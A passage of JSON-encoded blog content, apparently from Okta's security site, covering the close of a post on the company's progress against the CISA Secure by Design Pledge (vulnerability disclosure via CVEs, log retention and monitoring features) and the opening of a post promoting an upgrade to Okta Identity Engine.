future.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. 
Provide transparency on vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate transparency in vulnerability\\nreporting by including accurate Common Weakness Enumeration (CWE) and Common\\nPlatform Enumeration (CPE) fields in every Common Vulnerabilities and Exposures (CVE)\\nrecord for the manufacturer’s products. Additionally, issue CVEs in a timely manner for, at\\nminimum, all critical or high impact vulnerabilities that either require actions by a customer to patch or have evidence of active exploitation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta addresses vulnerabilities discovered in Okta software and services in accordance with the contractual terms entered into with customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Further, Okta has published CVEs when a vulnerability discovered in an Okta component requires action on the part of an Okta customer. Okta is a CVE Numbering Authority (CNA) authorized by CISA and MITRE to publish vulnerability information as CVE (Common Vulnerabilities and Exposures) bulletins. 
CVE bulletins for customer-installed Okta clients and agents are published at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://trust.okta.com/security-advisories/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trust.okta.com/security-advisories/\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta commits to also publishing CVE bulletins for vulnerabilities where they meet the following conditions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers are required to apply a security update to mitigate the risk, or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the absence of a security update, Okta Security is aware of reliable workarounds or other mitigating actions a customer could take using third-party tools to address the risk posed by a vulnerability, or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The vulnerability is subject to active exploitation in attacks on one or more Okta customers.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This approach balances the legitimate interests of Okta customers in understanding their exposure to risk, while  protecting them from unnecessary risks and reducing the “ticket fatigue” 
burden that would be imposed if customer teams were held to account for risks they have no agency to mitigate. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recognize that this approach will result in some vulnerabilities never reaching the public domain, limiting opportunities for other parties to derive lessons from these bugs. With this in mind, Okta commits to providing greater transparency about vulnerabilities addressed in Okta services, where those methods of disclosure no longer impose risks for our customers. Okta recently published, for example, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpasshardening\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"this short history\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of research into abuse of the Okta FastPass client as one approach to demonstrating this transparency, and presented on the same subject at   Oktane 2024 in Las Vegas.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is more important, in the eyes of many customers, is how we get the right security information into the hands of the right customer stakeholders in a timely fashion. Okta is committed to improving our methods of disclosing security-relevant information to customers. If you’re an Okta customer and haven’t provided your CISO/CIO and Security contacts to your Okta account representative, there is no time like the present!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. 
Deliver improved logging and monitoring for customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate a measurable increase in the\\nability for customers to gather evidence of cybersecurity intrusions affecting the\\nmanufacturer’s products.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Okta products provide mechanisms for administrators to troubleshoot access issues and for security teams to monitor for suspicious activity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At minimum, logged events include authentication and application access events, administrator and user actions, session context, and information on the source and target of an action. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Logged events are typically available in administrative consoles and programmatically via APIs and log streaming (see table below). 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Platform \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Auth0 Platform\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Access Gateway\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Fine-Grained Authorization (new)\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Logged events\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All user, administrator and support events for Okta Identity Engine, Okta Privileged Access, Okta Identity Governance, Identity Threat Protection, Okta Device Access\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User authentication and administrator 
events\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User authentication, access, authorization and administrative events.  Administrators can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/admin-settings-logging-log-level.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"manage the type and verbosity\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of logged events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modify events\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Log File Retention\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"90 days\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Aligned with subscription level.\\n\\n30 days for Enterprise licensed customers \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"30 
days\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"N/A\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrator access to logs\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Events can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Reports/syslog-filters.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"browsed, searched or filtered\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" directly in the Okta Admin Console. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Events can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/deploy-monitor/logs/view-log-events\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"browsed, searched or filtered\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" directly in the Auth0 Dashboard. 
\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Events can be browsed or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/admin-settings-log-download.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"downloaded\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/about-logging.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"management console\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of the Okta Access Gateway.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"N/A\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Programmatic access to log events\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log events can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed to security tools in near real-time\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and can also be queried and 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/#filtering-results\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"filtered\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log API\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log events can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/customize/log-streams\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed to security tools in near real-time\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and can also be queried and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/deploy-monitor/logs/retrieve-log-events-using-mgmt-api\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"filtered\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" programmatically using the Auth0 Management API.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/admin-settings-logging.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"configure log 
forwarders\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to push Okta Access Gateway logs to security tools.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modify events can be queried using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.fga.dev/integration/advanced/read-tuple-changes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Read Changes API\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is continually aiming to make log events more meaningful for security use cases. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In August 2024 alone:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provided new ways to correlate events by session or by token in the Okta Platform. A new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"rootSessionId \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"field was added to a range of user events to help security teams correlate all actions performed within the context of a user session. 
A new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"rootTokenId \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"field was added to a range of management API events to help customer security teams correlate all API calls that use a specific token.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provided administrators of the Auth0 Platform the ability to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/prioritized-log-streams\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"prioritize the streaming performance\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of security or risk-relevant event types (such as those relevant to detection and response) over other event types.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has identified a range of additional improvements that can help customer security teams respond more effectively to suspicious events. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The roadmap for the Okta Platform includes:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will take Log Investigator with Okta AI, currently in beta, to General Availability. Log Investigator provides customer admins an ability to construct System Log queries using natural language prompts. 
This aims to lower the bar for the domain knowledge required to work with System Log events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will add a new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"changedDetails \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"field to a range of configuration events to help customer security teams quickly identify the delta between former and current state after a configuration event.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver optional System Log events for Workflows executions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The roadmap for the Auth0 Platform includes:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/changelog#3ZqzIY4EVn7T0OiwbKoLxC\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"alerts\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and visual indicators for deviations from customer-defined thresholds set in the Auth0 Security Center.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver Team-specific audit dashboards for configuration changes, administrative grants and current valid sessions. 
\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver a visual session management dashboard for the Auth0 Management Console, along with the ability to revoke sessions. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The roadmap for the Okta Fine-Grained Authorization includes:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will deliver log streaming for the new FGA product in the first half of 2025.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conclusion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta applauds and thanks the US Cybersecurity and Infrastructure Security Agency’s efforts to promote Secure by Design among technology manufacturers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We look forward to working with our customers, partners, peers and CISA to contribute further to achieving a stronger default level of security for all users. \",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Our progress against the CISA Secure By Design Pledge."},"updatedAt":"2025-02-09T23:53:33.760Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. 
In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. </p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2024/five-reasons-to-upgrade-to-oie","id":"b65b742a-67d9-572a-ab7c-0861981334ee","title":"Five Reasons to Upgrade your Org to Okta Identity Engine","date":"2024-11-20T10:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Customer Identity \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"built to support end users’ digital access needs, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta Workforce Identity 
,\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" built to secure your internal workforce, are OIE-eligible platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s industry-leading Identity solutions are powered by the same underlying infrastructure. Okta Classic is Okta’s legacy engine and the Okta Identity Engine, or OIE, was introduced for all new customers effective March of 2022.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is OIE?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Identity Engine offers the most modern way to customize your Okta experience and implement flexible, customized Identity use cases. OIE is Okta’s newest improved platform engine, offering a security policy framework designed to align with NIST SP 800-63B and an authentication pipeline that strengthens your identity posture while delivering a superior user experience (UX).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine grants Okta administrators increased control over how applications and resources are both protected and accessed, while maintaining a seamless experience for end users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why should you upgrade?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are numerous security features to configure, customize and leverage in the Okta Identity Engine. Key benefits of upgrading your org include:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. 
Accessibility\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Upgrading an existing Okta org from Okta Classic’s engine to OIE is a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"free\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"platform upgrade\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", meaning there is no additional investment required.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Most features and functionality are available immediately post-upgrade to OIE, and the majority of your existing org configurations will seamlessly migrate. Most upgrades only take a few minutes to complete, with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"no downtime\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" for admins or end users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta also offers exceptional flexibility for administrators looking to upgrade. Admins can use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine-upgrade/self-service/self-service-process.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"self-service\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" tools to verify your org’s eligibility, resolve any pending action items, and schedule the upgrade at a time that best suits you. 
Even better, the upgrade from Okta Classic to OIE can be scheduled for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"any time during your Okta subscription term\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Enhanced authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine is designed not only to evaluate more granular context during user authentication, but also to make authentication policies much easier to manage.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application-level sign-on policies that were configured on a per-application basis in Okta Classic can instead be configured for multiple applications at once, or according to the assurance level you require from the user to sign in, using Okta Identity Engine.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In addition, benefits of OIE authentication include the enabling of modern, true multi-factor authentication (MFA) with different factor types and abstraction through assurance level. MFA possession factor constraints are introduced to further secure your org, including phishing-resistant MFA such as 